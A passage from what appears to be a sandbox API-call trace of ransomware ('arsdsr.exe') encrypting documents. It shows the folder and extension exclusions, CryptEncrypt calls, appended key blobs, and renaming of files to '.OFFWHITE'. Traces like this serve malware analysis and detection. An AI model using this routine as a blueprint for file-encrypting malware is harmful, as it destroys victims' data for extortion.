[0132.890] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0132.890] GetProcessHeap () returned 0x500000 [0132.890] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0132.890] GetProcessHeap () returned 0x500000 [0132.890] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0132.890] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.890] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.890] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0132.890] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.890] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.890] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0132.890] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.890] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.890] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295dc90*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295dc90*=0x100) returned 1 [0132.890] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.890] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.890] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295dc8c*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295dc8c*=0x100) returned 1 [0132.891] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x95b0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.891] SetLastError (dwErrCode=0x0) [0132.891] WriteFile (in: hFile=0x21c, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0132.892] GetLastError () returned 0x0 [0132.892] GetLastError () returned 0x0 [0132.892] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x96b0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.892] WriteFile (in: hFile=0x21c, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0132.892] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x97b0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.893] WriteFile (in: hFile=0x21c, lpBuffer=0x53f618*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x53f618*, lpNumberOfBytesWritten=0x295decc*=0x8, lpOverlapped=0x0) returned 1 [0132.893] GetProcessHeap () returned 0x500000 [0132.893] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x95b0) returned 0x55a7b8 [0132.893] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.893] ReadFile (in: hFile=0x21c, lpBuffer=0x55a7b8, nNumberOfBytesToRead=0x95b0, lpNumberOfBytesRead=0x295dec0, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesRead=0x295dec0*=0x95b0, lpOverlapped=0x0) returned 1 [0132.896] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.896] WriteFile (in: hFile=0x21c, lpBuffer=0x55a7b8*, nNumberOfBytesToWrite=0x95b0, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesWritten=0x295decc*=0x95b0, lpOverlapped=0x0) returned 1 [0132.896] GetProcessHeap () returned 0x500000 [0132.896] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55a7b8 | out: hHeap=0x500000) returned 1 [0132.896] CloseHandle (hObject=0x21c) returned 1 [0132.902] GetProcessHeap () returned 0x500000 [0132.902] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0132.902] GetProcessHeap () returned 0x500000 [0132.902] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0132.902] GetProcessHeap () returned 0x500000 [0132.902] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0132.902] GetProcessHeap () returned 0x500000 [0132.902] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0132.902] lstrcpyW (in: lpString1=0x295dcb8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\BruxE7OiJn6.pdf" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\BruxE7OiJn6.pdf") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\BruxE7OiJn6.pdf" [0132.902] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\BruxE7OiJn6.pdf", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\BruxE7OiJn6.pdf.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\BruxE7OiJn6.pdf.OFFWHITE" [0132.902] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\BruxE7OiJn6.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bk4kizkgwa\\bruxe7oijn6.pdf"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\BruxE7OiJn6.pdf.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bk4kizkgwa\\bruxe7oijn6.pdf.offwhite")) returned 1 [0132.903] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb6afa1e0, ftCreationTime.dwHighDateTime=0x1d5e375, ftLastAccessTime.dwLowDateTime=0x8598f9c0, ftLastAccessTime.dwHighDateTime=0x1d5dc05, ftLastWriteTime.dwLowDateTime=0x8598f9c0, ftLastWriteTime.dwHighDateTime=0x1d5dc05, nFileSizeHigh=0x0, nFileSizeLow=0x18d77, dwReserved0=0x295debc, dwReserved1=0x834c6249, cFileName="gIqXJ5XX6-R6oIcI.pps", cAlternateFileName="GIQXJ5~1.PPS")) returned 1 [0132.903] lstrcmpiW (lpString1="gIqXJ5XX6-R6oIcI.pps", lpString2=".") returned 1 [0132.903] lstrcmpiW (lpString1="gIqXJ5XX6-R6oIcI.pps", lpString2="..") returned 1 [0132.903] lstrcmpiW (lpString1="gIqXJ5XX6-R6oIcI.pps", lpString2="...") returned 1 [0132.903] lstrcmpiW (lpString1="gIqXJ5XX6-R6oIcI.pps", lpString2="windows") returned -1 [0132.903] lstrcmpiW (lpString1="gIqXJ5XX6-R6oIcI.pps", lpString2="$recycle.bin") returned 1 [0132.903] lstrcmpiW (lpString1="gIqXJ5XX6-R6oIcI.pps", lpString2="rsa") returned -1 [0132.903] lstrcmpiW (lpString1="gIqXJ5XX6-R6oIcI.pps", lpString2="ntuser.dat") returned -1 [0132.903] lstrcmpiW (lpString1="gIqXJ5XX6-R6oIcI.pps", lpString2="programdata") returned -1 [0132.903] lstrcmpiW (lpString1="gIqXJ5XX6-R6oIcI.pps", lpString2="appdata") returned 1 [0132.903] lstrcmpiW (lpString1="gIqXJ5XX6-R6oIcI.pps", lpString2="program files") returned -1 [0132.903] lstrcmpiW (lpString1="gIqXJ5XX6-R6oIcI.pps", lpString2="program files (x86)") returned -1 [0132.903] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\" [0132.903] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\", lpString2="gIqXJ5XX6-R6oIcI.pps" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\gIqXJ5XX6-R6oIcI.pps") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\gIqXJ5XX6-R6oIcI.pps" [0132.903] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.903] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.903] PathFindExtensionW (pszPath="gIqXJ5XX6-R6oIcI.pps") returned=".pps" [0132.903] lstrcmpiW (lpString1=".pps", lpString2=".exe") returned 1 [0132.903] lstrcmpiW (lpString1=".pps", lpString2=".log") returned 1 [0132.903] lstrcmpiW (lpString1=".pps", lpString2=".cab") returned 1 [0132.903] lstrcmpiW (lpString1=".pps", lpString2=".cmd") returned 1 [0132.903] lstrcmpiW (lpString1=".pps", lpString2=".com") returned 1 [0132.904] lstrcmpiW (lpString1=".pps", lpString2=".cpl") returned 1 [0132.904] lstrcmpiW (lpString1=".pps", lpString2=".ini") returned 1 [0132.904] lstrcmpiW (lpString1=".pps", lpString2=".dll") returned 1 [0132.904] lstrcmpiW (lpString1=".pps", lpString2=".url") returned -1 [0132.904] lstrcmpiW (lpString1=".pps", lpString2=".ttf") returned -1 [0132.904] lstrcmpiW (lpString1=".pps", lpString2=".mp3") returned 1 [0132.905] lstrcmpiW (lpString1=".pps", lpString2=".pif") returned 1 [0132.905] lstrcmpiW (lpString1=".pps", lpString2=".mp4") returned 1 [0132.905] lstrcmpiW (lpString1=".pps", lpString2=".OFFWHITE") returned 1 [0132.905] lstrcmpiW (lpString1=".pps", lpString2=".msi") returned 1 [0132.905] lstrcmpiW (lpString1="gIqXJ5XX6-R6oIcI.pps", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0132.905] GetProcessHeap () returned 0x500000 [0132.905] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x53f628 [0132.905] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\gIqXJ5XX6-R6oIcI.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bk4kizkgwa\\giqxj5xx6-r6oici.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0132.906] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295dee0 | out: lpFileSize=0x295dee0*=101751) returned 1 [0132.906] GetProcessHeap () returned 0x500000 [0132.906] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0132.906] GetProcessHeap () returned 0x500000 [0132.906] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0132.906] GetProcessHeap () returned 0x500000 [0132.906] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0132.906] GetProcessHeap () returned 0x500000 [0132.907] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0132.907] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.907] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.907] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0132.907] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.907] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.907] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0132.907] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.907] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.907] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295dc90*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295dc90*=0x100) returned 1 [0132.907] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.907] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.907] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295dc8c*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295dc8c*=0x100) returned 1 [0132.907] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x18d77, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.908] SetLastError (dwErrCode=0x0) [0132.908] WriteFile (in: hFile=0x21c, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0132.909] GetLastError () returned 0x0 [0132.909] GetLastError () returned 0x0 [0132.909] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x18e77, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.909] WriteFile (in: hFile=0x21c, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0132.910] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x18f77, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.910] WriteFile (in: hFile=0x21c, lpBuffer=0x53f628*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x53f628*, lpNumberOfBytesWritten=0x295decc*=0x8, lpOverlapped=0x0) returned 1 [0132.910] GetProcessHeap () returned 0x500000 [0132.910] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x18d77) returned 0x55a7b8 [0132.910] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.910] ReadFile (in: hFile=0x21c, lpBuffer=0x55a7b8, nNumberOfBytesToRead=0x18d77, lpNumberOfBytesRead=0x295dec0, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesRead=0x295dec0*=0x18d77, lpOverlapped=0x0) returned 1 [0132.916] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.916] WriteFile (in: hFile=0x21c, lpBuffer=0x55a7b8*, nNumberOfBytesToWrite=0x18d77, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesWritten=0x295decc*=0x18d77, lpOverlapped=0x0) returned 1 [0132.917] GetProcessHeap () returned 0x500000 [0132.917] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55a7b8 | out: hHeap=0x500000) returned 1 [0132.917] CloseHandle (hObject=0x21c) returned 1 [0132.919] GetProcessHeap () returned 0x500000 [0132.919] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0132.919] GetProcessHeap () returned 0x500000 [0132.919] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0132.919] GetProcessHeap () returned 0x500000 [0132.919] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0132.919] GetProcessHeap () returned 0x500000 [0132.919] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0132.919] lstrcpyW (in: lpString1=0x295dcb8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\gIqXJ5XX6-R6oIcI.pps" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\gIqXJ5XX6-R6oIcI.pps") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\gIqXJ5XX6-R6oIcI.pps" [0132.919] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\gIqXJ5XX6-R6oIcI.pps", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\gIqXJ5XX6-R6oIcI.pps.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\gIqXJ5XX6-R6oIcI.pps.OFFWHITE" [0132.919] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\gIqXJ5XX6-R6oIcI.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bk4kizkgwa\\giqxj5xx6-r6oici.pps"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\gIqXJ5XX6-R6oIcI.pps.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bk4kizkgwa\\giqxj5xx6-r6oici.pps.offwhite")) returned 1 [0132.935] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d704fc0, ftCreationTime.dwHighDateTime=0x1d5e7c3, ftLastAccessTime.dwLowDateTime=0x6f9f7bc0, ftLastAccessTime.dwHighDateTime=0x1d5e3e0, ftLastWriteTime.dwLowDateTime=0x6f9f7bc0, ftLastWriteTime.dwHighDateTime=0x1d5e3e0, nFileSizeHigh=0x0, nFileSizeLow=0x18c7c, dwReserved0=0x295debc, dwReserved1=0x834c6249, cFileName="JbRQehqW843y2LIP.ppt", cAlternateFileName="JBRQEH~1.PPT")) returned 1 [0132.935] lstrcmpiW (lpString1="JbRQehqW843y2LIP.ppt", lpString2=".") returned 1 [0132.935] lstrcmpiW (lpString1="JbRQehqW843y2LIP.ppt", lpString2="..") returned 1 [0132.935] lstrcmpiW (lpString1="JbRQehqW843y2LIP.ppt", lpString2="...") returned 1 [0132.935] lstrcmpiW (lpString1="JbRQehqW843y2LIP.ppt", lpString2="windows") returned -1 [0132.935] lstrcmpiW (lpString1="JbRQehqW843y2LIP.ppt", lpString2="$recycle.bin") returned 1 [0132.936] lstrcmpiW (lpString1="JbRQehqW843y2LIP.ppt", lpString2="rsa") returned -1 [0132.936] lstrcmpiW (lpString1="JbRQehqW843y2LIP.ppt", lpString2="ntuser.dat") returned -1 [0132.936] lstrcmpiW (lpString1="JbRQehqW843y2LIP.ppt", lpString2="programdata") returned -1 [0132.936] lstrcmpiW (lpString1="JbRQehqW843y2LIP.ppt", lpString2="appdata") returned 1 [0132.936] lstrcmpiW (lpString1="JbRQehqW843y2LIP.ppt", lpString2="program files") returned -1 [0132.936] lstrcmpiW (lpString1="JbRQehqW843y2LIP.ppt", lpString2="program files (x86)") returned -1 [0132.936] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\" [0132.936] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\", lpString2="JbRQehqW843y2LIP.ppt" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\JbRQehqW843y2LIP.ppt") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\JbRQehqW843y2LIP.ppt" [0132.936] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.936] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.936] PathFindExtensionW (pszPath="JbRQehqW843y2LIP.ppt") returned=".ppt" [0132.936] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0132.936] lstrcmpiW (lpString1=".ppt", lpString2=".log") returned 1 [0132.936] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0132.936] lstrcmpiW (lpString1=".ppt", lpString2=".cmd") returned 1 [0132.936] lstrcmpiW (lpString1=".ppt", lpString2=".com") returned 1 [0132.936] lstrcmpiW (lpString1=".ppt", lpString2=".cpl") returned 1 [0132.936] lstrcmpiW (lpString1=".ppt", lpString2=".ini") returned 1 [0132.936] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0132.936] lstrcmpiW (lpString1=".ppt", lpString2=".url") returned -1 [0132.936] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1 [0132.936] lstrcmpiW (lpString1=".ppt", lpString2=".mp3") returned 1 [0132.936] lstrcmpiW (lpString1=".ppt", lpString2=".pif") returned 1 [0132.936] lstrcmpiW (lpString1=".ppt", lpString2=".mp4") returned 1 [0132.936] lstrcmpiW (lpString1=".ppt", lpString2=".OFFWHITE") returned 1 [0132.936] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0132.936] lstrcmpiW (lpString1="JbRQehqW843y2LIP.ppt", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0132.936] GetProcessHeap () returned 0x500000 [0132.937] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x53f638 [0132.937] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\JbRQehqW843y2LIP.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bk4kizkgwa\\jbrqehqw843y2lip.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0132.937] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295dee0 | out: lpFileSize=0x295dee0*=101500) returned 1 [0132.937] GetProcessHeap () returned 0x500000 [0132.937] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0132.937] GetProcessHeap () returned 0x500000 [0132.937] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0132.937] GetProcessHeap () returned 0x500000 [0132.937] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0132.937] GetProcessHeap () returned 0x500000 [0132.937] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0132.937] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.937] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.937] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0132.937] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.937] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.937] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0132.938] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.938] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.938] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295dc90*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295dc90*=0x100) returned 1 [0132.938] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.938] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.938] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295dc8c*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295dc8c*=0x100) returned 1 [0132.938] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x18c7c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.938] SetLastError (dwErrCode=0x0) [0132.938] WriteFile (in: hFile=0x21c, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0132.940] GetLastError () returned 0x0 [0132.940] GetLastError () returned 0x0 [0132.940] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x18d7c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.941] WriteFile (in: hFile=0x21c, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0132.941] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x18e7c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.942] WriteFile (in: hFile=0x21c, lpBuffer=0x53f638*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x53f638*, lpNumberOfBytesWritten=0x295decc*=0x8, lpOverlapped=0x0) returned 1 [0132.942] GetProcessHeap () returned 0x500000 [0132.942] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x18c7c) returned 0x55a7b8 [0132.942] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.942] ReadFile (in: hFile=0x21c, lpBuffer=0x55a7b8, nNumberOfBytesToRead=0x18c7c, lpNumberOfBytesRead=0x295dec0, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesRead=0x295dec0*=0x18c7c, lpOverlapped=0x0) returned 1 [0132.948] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.948] WriteFile (in: hFile=0x21c, lpBuffer=0x55a7b8*, nNumberOfBytesToWrite=0x18c7c, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesWritten=0x295decc*=0x18c7c, lpOverlapped=0x0) returned 1 [0132.949] GetProcessHeap () returned 0x500000 [0132.949] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55a7b8 | out: hHeap=0x500000) returned 1 [0132.949] CloseHandle (hObject=0x21c) returned 1 [0132.950] GetProcessHeap () returned 0x500000 [0132.951] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0132.951] GetProcessHeap () 